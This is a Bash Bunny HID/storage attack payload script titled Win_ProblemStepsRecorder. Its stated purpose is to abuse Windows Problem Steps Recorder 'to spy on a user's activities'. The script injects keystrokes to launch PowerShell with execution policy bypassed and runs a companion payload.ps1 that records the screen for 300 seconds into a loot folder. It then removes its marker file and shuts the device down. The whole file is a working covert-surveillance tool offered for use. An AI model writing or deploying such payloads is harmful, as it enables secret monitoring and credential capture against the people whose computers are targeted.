#!/bin/bash
#
# Title:            Win_ProblemStepsRecorder
#
# Description:      
#                   Abuse of "Windows Problem Steps Recorder" 
#                   to spy on a user's activities.
#
# Author:           TW-D
# Version:          1.0
# Category:         Credentials
# Target:           Since Microsoft Windows 7 and 2008 R2
# Attackmodes:      HID and STORAGE
#
# TESTED ON
# ===============
# Microsoft Windows 10 Family Version 20H2 (PowerShell 5.1)
# Microsoft Windows 10 Professional Version 20H2 (PowerShell 5.1)
#
# NOTE
# ===============
# Use the browser "Internet Explorer" to read the ".mht" file correctly.
#
# STATUS
# ===============
# Magenta solid ................................... SETUP
# Yellow single blink ............................. ATTACK
# Yellow double blink ............................. STAGE2
# Yellow triple blink ............................. STAGE3
# Cyan inverted single blink ...................... SPECIAL
# White fast blink ................................ CLEANUP
# Green 1000ms VERYFAST blink followed by SOLID ... FINISH

######## INITIALIZATION ########

readonly BB_LABEL="BashBunny"
readonly RECORDER_TIME=300

######## SETUP ########

LED SETUP

ATTACKMODE HID STORAGE
GET SWITCH_POSITION
udisk mount

######## ATTACK ########

LED ATTACK

Q DELAY 7000
RUN WIN "powershell -NoLogo -NoProfile -ExecutionPolicy Bypass"
Q DELAY 7000

LED STAGE2

Q STRING "\$BB_VOLUME = \"\$((Get-WmiObject -Class Win32_Volume -Filter \"Label LIKE '${BB_LABEL}'\").Name)\""
Q ENTER
Q DELAY 3500

Q STRING "\$BB_SWITCH = \"\${BB_VOLUME}payloads\\${SWITCH_POSITION}\\\""
Q ENTER
Q DELAY 1500

Q STRING "CD \"\${BB_SWITCH}\""
Q ENTER
Q DELAY 1500

LED STAGE3

Q STRING ".\payload.ps1 -BB_VOLUME \"\${BB_VOLUME}\" -RECORDER_TIME ${RECORDER_TIME}"
Q ENTER
Q DELAY 1500

LED SPECIAL

until [ -f /root/udisk/loot/done.txt ]; do sleep 10; sync; done

######## CLEANUP ########

LED CLEANUP

rm /root/udisk/loot/done.txt
sync
udisk unmount

######## FINISH ########

LED FINISH

shutdown -h 0